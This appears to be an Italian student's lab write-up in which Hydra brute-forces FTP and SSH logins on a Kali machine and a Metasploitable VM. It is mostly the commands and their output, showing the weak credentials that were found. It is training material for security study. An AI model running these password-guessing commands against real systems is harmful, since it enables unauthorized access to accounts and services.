S6L4

LA TRACCIA DI OGGI CONSISTEVA DI CRACCARE L'AUTENTICAZIONE DEI SERVIZI DI RETE FTP E SSH SULLA NOSTRA MACCHINA DI KALI

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[DATA] attacking SSH://IV.V.4.15.22/
   ---(kali⊛ kali)-[~]
  hydra -l test_user -P /usr/share/seclists/Passwords/500-worst-passwords.txt 192.168.1.37 -t4 ssh -V
  Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding,
  these *** ignore laws and ethics anyway).
  Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-11 17:24:16
   [WARNING] Restorefile (you have 10 seconds to abort ... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
   [DATA] max 4 tasks per 1 server, overall 4 tasks, 499 login tries (l:1/p:499), ~125 tries per task
   [DATA] attacking ssh://192.168.1.37:22/
   [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "123456" - 1 of 499 [child 0] (0/0)
  [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "password" - 2 of 499 [child 1] (0/0)
   [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "12345678" - 3 of 499 [child 2] (0/0)
   [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "1234" - 4 of 499 [child 3] (0/0)
   [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "pussy" - 5 of 499 [child 3] (0/0)
  [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "12345" - 6 of 499 [child 0] (0/0)
  [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "dragon" - 7 of 499 [child 1] (0/0)
   [ATTEMPT] target 192.168.1.37 - login "test_user" - pass "testpass" - 8 of 499 [child 2] (0/0)
  [22][ssh] host: 192.168.1.37 login: test_user password: testpass
  1 of 1 target successfully completed, 1 valid password found
  Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-11 17:24:30
 ---(kali⊛kali)-[~]
hydra -l test_user -P /usr/share/seclists/Passwords/500-worst-passwords.txt 192.168.1.37 -t4 ftp -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding,
these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-11 17:27:24
[DATA] max 4 tasks per 1 server, overall 4 tasks, 499 login tries (l:1/p:499), ~125 tries per task
[DATA] attacking ftp://192.168.1.37:21/
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "123456" - 1 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "password" - 2 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "12345678" - 3 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "1234" - 4 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "pussy" - 5 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "12345" - 6 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "dragon" - 7 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.1.37 - login "test_user" - pass "testpass" - 8 of 499 [child 3] (0/0)
[21][ftp] host: 192.168.1.37 login: test_user password: testpass
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-11 17:27:31
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SU METASPLOITABLE SONO STATI TROVATI SERVIZI DI RETE FTP,TELNET SSH

```
—(kali⊕kali)-[~]
🖵 hydra -l msfadmin -P /usr/share/seclists/Passwords/500-worst-passwords.txt 192.168.50.101 -t4 ftp -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding,
these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-11 17:32:33
[DATA] max 4 tasks per 1 server, overall 4 tasks, 499 login tries (l:1/p:499), ~125 tries per task
[DATA] attacking ftp://192.168.50.101:21/
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "123456" - 1 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "password" - 2 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "12345678" - 3 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "1234" - 4 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "pussy" - 5 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "12345" - 6 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "dragon" - 7 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "testpass" - 8 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "696969" - 9 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "msfadmin" - 10 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "letmein" - 11 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "baseball" - 12 of 499 [child 3] (0/0)
[21][ftp] host: 192.168.50.101 login: msfadmin password: msfadmin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-11 17:32:45
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[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "pass" - 19 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "fuckme" - 20 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "6969" - 21 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "jordan" - 22 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "harley" - 23 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "ranger" - 24 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "iwantu" - 25 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "msfadmin" - 26 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "hunter" - 27 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "fuck" - 28 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 login: msfadmin password: msfadmin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-01-11 17:36:39
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Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-01-11 17:44:12
[DATA] max 4 tasks per 1 server, overall 4 tasks, 499 login tries (l:1/p:499), ~125 tries per task
[DATA] attacking ssh://192.168.50.101:22/
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "123456" - 1 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "password" - 2 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "12345678" - 3 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "1234" - 4 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "pussy" - 5 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "12345" - 6 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "dragon" - 7 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "testpass" - 8 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "696969" - 9 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "jennifer" - 10 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "letmein" - 11 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "baseball" - 12 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "master" - 13 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "michael" - 14 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "football" - 15 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "shadow" - 16 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "monkey" - 17 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "abc123" - 18 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "pass" - 19 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "fuckme" - 20 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "6969" - 21 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "jordan" - 22 of 499 [child 3] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "harley" - 23 of 499 [child 0] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "ranger" - 24 of 499 [child 2] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "iwantu" - 25 of 499 [child 1] (0/0)
[ATTEMPT] target 192.168.50.101 - login "msfadmin" - pass "msfadmin" - 26 of 499 [child 3] (0/0)
[22][ssh] host: 192.168.50.101 login: msfadmin password: msfadmin
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